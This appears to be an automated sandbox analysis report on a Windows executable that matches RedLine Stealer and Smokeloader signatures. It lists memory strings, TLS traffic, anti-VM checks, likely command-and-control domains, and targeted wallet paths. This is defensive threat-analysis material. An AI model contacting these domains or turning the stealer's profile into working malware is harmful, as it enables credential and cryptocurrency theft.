            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1349882274.0000000003338000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: xNuh0DUJaG.exe, 00000003.00000003.1349882274.0000000003338000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
            Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1349882274.0000000003338000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
            Source: xNuh0DUJaG.exe, 00000003.00000003.1349882274.0000000003338000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
            Source: xNuh0DUJaG.exe, 00000003.00000003.1349882274.0000000003338000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: xNuh0DUJaG.exe, 00000003.00000003.1349882274.0000000003338000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: xNuh0DUJaG.exe, 00000003.00000003.1349882274.0000000003338000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
            Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49706 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49708 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49714 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49725 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49734 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49743 version: TLS 1.2
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: 3_2_004367F0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard, 3_2_004367F0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: 3_2_00436980 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,StretchBlt,ReleaseDC,DeleteObject,DeleteObject, 3_2_00436980

            System Summary

            Source: 00000003.00000002.1541906304.0000000000480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: String function: 00414C10 appears 116 times
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: String function: 021083D7 appears 77 times
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: String function: 02114E77 appears 116 times
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: String function: 00408170 appears 45 times
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 1804
            Source: xNuh0DUJaG.exe, 00000003.00000000.1267391268.000000000044D000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamesOrehinal4 vs xNuh0DUJaG.exe
            Source: xNuh0DUJaG.exe, 00000003.00000003.1277152933.0000000000582000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesOrehinal4 vs xNuh0DUJaG.exe
            Source: xNuh0DUJaG.exe | Binary or memory string: OriginalFilenamesOrehinal4 vs xNuh0DUJaG.exe
            Source: xNuh0DUJaG.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000003.00000002.1541906304.0000000000480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: xNuh0DUJaG.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@2/5@11/2
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: 3_2_004807A6 CreateToolhelp32Snapshot,Module32First, 3_2_004807A6
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: 3_2_0043B870 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW, 3_2_0043B870
            Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7464
            Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\00805696-71f3-4ac6-851e-f70205b00fa8
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: xNuh0DUJaG.exe, 00000003.00000003.1322241458.0000000003017000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1334614186.0000000003013000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1322061053.0000000003034000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: xNuh0DUJaG.exe | Virustotal: Detection: 48%
            Source: xNuh0DUJaG.exe | ReversingLabs: Detection: 47%
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File read: C:\Users\user\Desktop\xNuh0DUJaG.exe
            Source: unknown | Process created: C:\Users\user\Desktop\xNuh0DUJaG.exe "C:\Users\user\Desktop\xNuh0DUJaG.exe"
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: msimg32.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: msvcr100.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: webio.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

            Data Obfuscation

            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Unpacked PE file: 3.2.xNuh0DUJaG.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Unpacked PE file: 3.2.xNuh0DUJaG.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: 3_2_00441850 push eax; mov dword ptr [esp], 0E0908DBh 3_2_00441853
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: 3_2_00483156 push ebx; ret 3_2_00483157
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: 3_2_0048512A pushad ; ret 3_2_0048512B
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: 3_2_00485195 pushfd ; ret 3_2_00485196
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: 3_2_00483CFE push esi; retn 001Ch 3_2_00483D02
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: 3_2_0212B05A push ebp; iretd 3_2_0212B05D
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: 3_2_02141AB7 push eax; mov dword ptr [esp], 0E0908DBh 3_2_02141ABA
            Source: xNuh0DUJaG.exe | Static PE information: section name: .text entropy: 7.808585135243993
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe TID: 7816 | Thread sleep time: -120000s >= -30000s
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696501413o
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
            Source: Amcache.hve.10.dr | Binary or memory string: VMware
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696501413j
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
            Source: Amcache.hve.10.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294448440.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: Amcache.hve.10.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696501413t
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - HKVMware20,11696501413]
            Source: Amcache.hve.10.dr | Binary or memory string: vmci.sys
            Source: Amcache.hve.10.dr | Binary or memory string: VMware20,1
            Source: Amcache.hve.10.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.10.dr | Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.10.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.10.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696501413
            Source: Amcache.hve.10.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.10.dr | Binary or memory string: VMware PCI VMCI Bus Device
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
            Source: Amcache.hve.10.dr | Binary or memory string: VMware VMCI Bus Device
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
            Source: Amcache.hve.10.dr | Binary or memory string: VMware Virtual RAM
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696501413t
            Source: Amcache.hve.10.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactiveuserers.comVMware20,11696501413
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696501413
            Source: Amcache.hve.10.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.10.dr | Binary or memory string: VMware Virtual USB Mouse
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
            Source: Amcache.hve.10.dr | Binary or memory string: vmci.syshbin
            Source: Amcache.hve.10.dr | Binary or memory string: VMware, Inc.
            Source: Amcache.hve.10.dr | Binary or memory string: VMware20,1hbin@
            Source: Amcache.hve.10.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.10.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.10.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000539000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW(
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696501413x
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
            Source: Amcache.hve.10.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
            Source: Amcache.hve.10.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696501413s
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334127564.00000000030B2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696501413p
            Source: Amcache.hve.10.dr | Binary or memory string: vmci.syshbin`
            Source: Amcache.hve.10.dr | Binary or memory string: \driver\vmci,\driver\pci
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
            Source: Amcache.hve.10.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.10.dr | Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
            Source: Amcache.hve.10.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294448440.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWJ
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696501413
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696501413f
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | API call chain: ExitProcess graph end node | graph_3-26155
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: 3_2_004402C0 LdrInitializeThunk, | 3_2_004402C0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: 3_2_00480083 push dword ptr fs:[00000030h] | 3_2_00480083
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: 3_2_0210092B mov eax, dword ptr fs:[00000030h] | 3_2_0210092B
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: 3_2_02100D90 mov eax, dword ptr fs:[00000030h] | 3_2_02100D90

            HIPS / PFW / Operating System Protection Evasion

            Source: xNuh0DUJaG.exe | String found in binary or memory: robinsharez.shop
            Source: xNuh0DUJaG.exe | String found in binary or memory: handscreamny.shop
            Source: xNuh0DUJaG.exe | String found in binary or memory: chipdonkeruz.shop
            Source: xNuh0DUJaG.exe | String found in binary or memory: versersleep.shop
            Source: xNuh0DUJaG.exe | String found in binary or memory: crowdwarek.shop
            Source: xNuh0DUJaG.exe | String found in binary or memory: apporholis.shop
            Source: xNuh0DUJaG.exe | String found in binary or memory: femalsabler.shop
            Source: xNuh0DUJaG.exe | String found in binary or memory: soundtappysk.shop
            Source: xNuh0DUJaG.exe | String found in binary or memory: skidjazzyric.click
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: Amcache.hve.10.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.10.dr | Binary or memory string: msmpeng.exe
            Source: Amcache.hve.10.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.10.dr | Binary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
            Source: Yara match | File source: Process Memory Space: xNuh0DUJaG.exe PID: 7464, type: MEMORYSTR
            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Electrum-LTC\wallets
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\ElectronCash\wallets
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000566000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Jaxx LibertyoH
